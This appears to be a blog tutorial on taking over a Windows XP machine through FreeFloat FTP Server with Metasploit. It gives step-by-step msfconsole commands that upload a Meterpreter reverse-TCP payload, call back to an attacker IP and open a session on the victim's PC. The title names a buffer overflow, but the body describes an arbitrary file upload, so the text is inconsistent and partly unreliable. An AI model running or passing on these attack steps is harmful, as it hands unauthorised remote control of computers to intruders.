Header Ads

Hack Remote PC using Free Float FTP Server USER Command Buffer Overflow

This Metasploit module abuses multiple issues in FreeFloat: 1. No credential is actually needed to login; 2. User’s default path is in C:\, and this cannot be changed; 3. User can write to anywhere on the server’s file system. As a result of these poor implementations, a malicious user can just log in and then upload files, and let WMI (Management Instrumentation service) to execute the payload uploaded.

Exploit Targets

FreeFloat

Requirement

  Attacker : Backtrack 5

Victim PC : Windows XP
Open backtrack terminal type  msfconsole
1 Hack Windows PC in Network using FreeFloat FTP Server Arbitrary File Upload
Now type  use exploit/windows/ftp/freefloatftp_webm
msf exploit ( freefloatftp_webm )> set payload windows/meterpreter/reverse_tcp
msf exploit ( freefloatftp_webm )> set lhost 192.168.0.109 (IP of Local Host)
msf exploit ( freefloatftp_webm )> set rhost 192.168.0.108  (Address of remote machine)
msf exploit ( freefloatftp_webm )> exploit
2 Hack Windows PC in Network using FreeFloat FTP Server Arbitrary File Upload
Now you have access to the victims PC. Use “ Sessions -l ” and the Session number to connect to the session. And Now Type “ sessions -i ID “ 
3 Hack Windows PC in Network using FreeFloat FTP Server Arbitrary File Upload
4 Hack Windows PC in Network using FreeFloat FTP Server Arbitrary File Upload


Powered by Blogger.